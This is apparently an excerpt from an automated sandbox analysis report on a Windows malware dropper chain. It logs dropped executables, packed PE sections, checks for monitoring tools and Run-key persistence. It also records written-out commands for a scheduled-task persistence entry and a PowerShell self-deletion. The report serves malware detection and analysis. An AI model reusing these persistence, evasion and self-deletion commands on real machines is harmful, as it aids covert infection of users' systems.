                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeSection loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeSection loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeSection loaded: schannel.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeSection loaded: mskeyprotect.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeSection loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeSection loaded: ncryptsslp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeSection loaded: dpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeSection loaded: wbemcomn.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeSection loaded: winmm.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeSection loaded: wininet.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeSection loaded: rstrtmgr.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeSection loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeSection loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeSection loaded: urlmon.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeSection loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeSection loaded: netutils.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeSection loaded: dpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeSection loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeSection loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeSection loaded: ntmarta.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeSection loaded: mozglue.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeSection loaded: wsock32.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeSection loaded: vcruntime140.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeSection loaded: msvcp140.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeSection loaded: vcruntime140.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeSection loaded: propsys.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeSection loaded: edputil.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeSection loaded: windows.staterepositoryps.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeSection loaded: appresolver.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeSection loaded: bcp47langs.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeSection loaded: slc.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeSection loaded: sppc.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeSection loaded: onecorecommonproxystub.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeSection loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeSection loaded: pcacli.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeSection loaded: mpr.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeSection loaded: sfc_os.dll
                    Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                    Source: file.exeStatic file information: File size 3047936 > 1048576
                    Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                    Source: file.exeStatic PE information: Raw size of tddfmghq is bigger than: 0x100000 < 0x2b6800

                    Data Obfuscation

                    barindex
                    Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.b20000.0.unpack :EW;.rsrc:W;.idata :W;tddfmghq:EW;zxizpfjk:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;tddfmghq:EW;zxizpfjk:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 3.2.skotes.exe.f30000.0.unpack :EW;.rsrc:W;.idata :W;tddfmghq:EW;zxizpfjk:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;tddfmghq:EW;zxizpfjk:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 4.2.skotes.exe.f30000.0.unpack :EW;.rsrc:W;.idata :W;tddfmghq:EW;zxizpfjk:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;tddfmghq:EW;zxizpfjk:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exeUnpacked PE file: 46.2.d5cd5e4aa8.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ewodcgyw:EW;mohodnpu:EW;.taggant:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeUnpacked PE file: 48.2.9434b989db.exe.f20000.0.unpack :EW;.rsrc:W;.idata :W;lccfmtjw:EW;cjdwjaeg:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;lccfmtjw:EW;cjdwjaeg:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.0.0.1; del in.exe
                    Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
                    Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.0.0.1; del in.exe
                    Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
                    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 20_2_009B66A8 GetCurrentProcess,GetProcessTimes,memset,GetModuleHandleW,GetProcAddress,LoadLibraryW,GetProcAddress,GetCurrentProcess,GetProcAddress,GetCurrentProcess,fputs,fputs,20_2_009B66A8
                    Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                    Source: 7z.dll.16.drStatic PE information: real checksum: 0x0 should be: 0x1a2c6b
                    Source: Intel_PTT_EK_Recertification.exe.29.drStatic PE information: real checksum: 0x0 should be: 0x1c320c
                    Source: 9434b989db.exe.14.drStatic PE information: real checksum: 0x2c8893 should be: 0x2c3e4f
                    Source: random[1].exe0.14.drStatic PE information: real checksum: 0x44d80a should be: 0x44ed54
                    Source: ea17d0b77a.exe.14.drStatic PE information: real checksum: 0x1cff82 should be: 0x1cd17b
                    Source: random[1].exe2.14.drStatic PE information: real checksum: 0x1cff82 should be: 0x1cd17b
                    Source: 352def4414.exe.14.drStatic PE information: real checksum: 0x44d80a should be: 0x44ed54
                    Source: random[1].exe1.14.drStatic PE information: real checksum: 0x1e4ae2 should be: 0x1f2d4f
                    Source: 7z.exe.16.drStatic PE information: real checksum: 0x0 should be: 0x7b29e
                    Source: file.exeStatic PE information: real checksum: 0x2f0b23 should be: 0x2f207a
                    Source: skotes.exe.0.drStatic PE information: real checksum: 0x2f0b23 should be: 0x2f207a
                    Source: d5cd5e4aa8.exe.14.drStatic PE information: real checksum: 0x1e4ae2 should be: 0x1f2d4f
                    Source: random[2].exe.14.drStatic PE information: real checksum: 0x2c8893 should be: 0x2c3e4f
                    Source: in.exe.27.drStatic PE information: real checksum: 0x0 should be: 0x1c320c
                    Source: file.exeStatic PE information: section name:
                    Source: file.exeStatic PE information: section name: .idata
                    Source: file.exeStatic PE information: section name: tddfmghq
                    Source: file.exeStatic PE information: section name: zxizpfjk
                    Source: file.exeStatic PE information: section name: .taggant
                    Source: skotes.exe.0.drStatic PE information: section name:
                    Source: skotes.exe.0.drStatic PE information: section name: .idata
                    Source: skotes.exe.0.drStatic PE information: section name: tddfmghq
                    Source: skotes.exe.0.drStatic PE information: section name: zxizpfjk
                    Source: skotes.exe.0.drStatic PE information: section name: .taggant
                    Source: random[1].exe0.14.drStatic PE information: section name:
                    Source: random[1].exe0.14.drStatic PE information: section name: .idata
                    Source: random[1].exe0.14.drStatic PE information: section name:
                    Source: random[1].exe0.14.drStatic PE information: section name: lbajxhwa
                    Source: random[1].exe0.14.drStatic PE information: section name: ribahoty
                    Source: random[1].exe0.14.drStatic PE information: section name: .taggant
                    Source: 352def4414.exe.14.drStatic PE information: section name:
                    Source: 352def4414.exe.14.drStatic PE information: section name: .idata
                    Source: 352def4414.exe.14.drStatic PE information: section name:
                    Source: 352def4414.exe.14.drStatic PE information: section name: lbajxhwa
                    Source: 352def4414.exe.14.drStatic PE information: section name: ribahoty
                    Source: 352def4414.exe.14.drStatic PE information: section name: .taggant
                    Source: random[1].exe1.14.drStatic PE information: section name:
                    Source: random[1].exe1.14.drStatic PE information: section name: .idata
                    Source: random[1].exe1.14.drStatic PE information: section name:
                    Source: random[1].exe1.14.drStatic PE information: section name: ewodcgyw
                    Source: random[1].exe1.14.drStatic PE information: section name: mohodnpu
                    Source: random[1].exe1.14.drStatic PE information: section name: .taggant
                    Source: d5cd5e4aa8.exe.14.drStatic PE information: section name:
                    Source: d5cd5e4aa8.exe.14.drStatic PE information: section name: .idata
                    Source: d5cd5e4aa8.exe.14.drStatic PE information: section name:
                    Source: d5cd5e4aa8.exe.14.drStatic PE information: section name: ewodcgyw
                    Source: d5cd5e4aa8.exe.14.drStatic PE information: section name: mohodnpu
                    Source: d5cd5e4aa8.exe.14.drStatic PE information: section name: .taggant
                    Source: random[1].exe2.14.drStatic PE information: section name:
                    Source: random[1].exe2.14.drStatic PE information: section name: .idata
                    Source: random[1].exe2.14.drStatic PE information: section name:
                    Source: random[1].exe2.14.drStatic PE information: section name: vznsjynp
                    Source: random[1].exe2.14.drStatic PE information: section name: aooxnxiu
                    Source: random[1].exe2.14.drStatic PE information: section name: .taggant
                    Source: ea17d0b77a.exe.14.drStatic PE information: section name:
                    Source: ea17d0b77a.exe.14.drStatic PE information: section name: .idata
                    Source: ea17d0b77a.exe.14.drStatic PE information: section name:
                    Source: ea17d0b77a.exe.14.drStatic PE information: section name: vznsjynp
                    Source: ea17d0b77a.exe.14.drStatic PE information: section name: aooxnxiu
                    Source: ea17d0b77a.exe.14.drStatic PE information: section name: .taggant
                    Source: random[2].exe.14.drStatic PE information: section name:
                    Source: random[2].exe.14.drStatic PE information: section name: .idata
                    Source: random[2].exe.14.drStatic PE information: section name: lccfmtjw
                    Source: random[2].exe.14.drStatic PE information: section name: cjdwjaeg
                    Source: random[2].exe.14.drStatic PE information: section name: .taggant
                    Source: 9434b989db.exe.14.drStatic PE information: section name:
                    Source: 9434b989db.exe.14.drStatic PE information: section name: .idata
                    Source: 9434b989db.exe.14.drStatic PE information: section name: lccfmtjw
                    Source: 9434b989db.exe.14.drStatic PE information: section name: cjdwjaeg
                    Source: 9434b989db.exe.14.drStatic PE information: section name: .taggant
                    Source: in.exe.27.drStatic PE information: section name: UPX2
                    Source: Intel_PTT_EK_Recertification.exe.29.drStatic PE information: section name: UPX2
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B3D91C push ecx; ret 0_2_00B3D92F
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B31359 push es; ret 0_2_00B3135A
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_00F4D91C push ecx; ret 3_2_00F4D92F
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 4_2_00F4D91C push ecx; ret 4_2_00F4D92F
                    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 20_2_0099676A push rcx; ret 20_2_0099676B
                    Source: file.exeStatic PE information: section name: entropy: 7.9825535221264685
                    Source: skotes.exe.0.drStatic PE information: section name: entropy: 7.9825535221264685
                    Source: random[1].exe0.14.drStatic PE information: section name: lbajxhwa entropy: 7.955742518108575
                    Source: 352def4414.exe.14.drStatic PE information: section name: lbajxhwa entropy: 7.955742518108575
                    Source: random[1].exe1.14.drStatic PE information: section name: ewodcgyw entropy: 7.948285822322563
                    Source: d5cd5e4aa8.exe.14.drStatic PE information: section name: ewodcgyw entropy: 7.948285822322563
                    Source: random[1].exe2.14.drStatic PE information: section name: entropy: 7.966180915180425
                    Source: random[1].exe2.14.drStatic PE information: section name: vznsjynp entropy: 7.952847512751214
                    Source: ea17d0b77a.exe.14.drStatic PE information: section name: entropy: 7.966180915180425
                    Source: ea17d0b77a.exe.14.drStatic PE information: section name: vznsjynp entropy: 7.952847512751214
                    Source: initial sampleStatic PE information: section name: UPX0
                    Source: initial sampleStatic PE information: section name: UPX1
                    Source: initial sampleStatic PE information: section name: UPX0
                    Source: initial sampleStatic PE information: section name: UPX1

                    Persistence and Installation Behavior

                    barindex
                    Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
                    Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: attrib.exe
                    Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: attrib.exe
                    Source: C:\Windows\System32\cmd.exeProcess created: attrib.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: attrib.exe
                    Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: attrib.exe
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\random[1].exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\main\in.exeFile created: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeJump to dropped file
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exeFile created: C:\Users\user\AppData\Local\Temp\main\7z.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[1].exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[2].exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[2].exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeFile created: C:\Users\user\AppData\Local\Temp\main\extracted\in.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1018751001\0a99277d48.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exeFile created: C:\Users\user\AppData\Local\Temp\main\7z.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeJump to dropped file

                    Boot Survival

                    barindex
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 9434b989db.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ea17d0b77a.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ceb22082b1.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0a99277d48.exeJump to behavior
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonclassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonclassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeWindow searched: window name: FilemonClass
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeWindow searched: window name: RegmonClass
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeWindow searched: window name: FilemonClass
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeWindow searched: window name: Regmonclass
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeWindow searched: window name: Filemonclass
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exeWindow searched: window name: FilemonClass
                    Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exeWindow searched: window name: RegmonClass
                    Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exeWindow searched: window name: FilemonClass
                    Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exeWindow searched: window name: Regmonclass
                    Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exeWindow searched: window name: Filemonclass
                    Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exeWindow searched: window name: Regmonclass
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeWindow searched: window name: FilemonClass
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeWindow searched: window name: RegmonClass
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeWindow searched: window name: FilemonClass
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeWindow searched: window name: Regmonclass
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeWindow searched: window name: Filemonclass
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeWindow searched: window name: FilemonClass
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeWindow searched: window name: RegmonClass
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeWindow searched: window name: FilemonClass
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeWindow searched: window name: Regmonclass
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeWindow searched: window name: Filemonclass
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
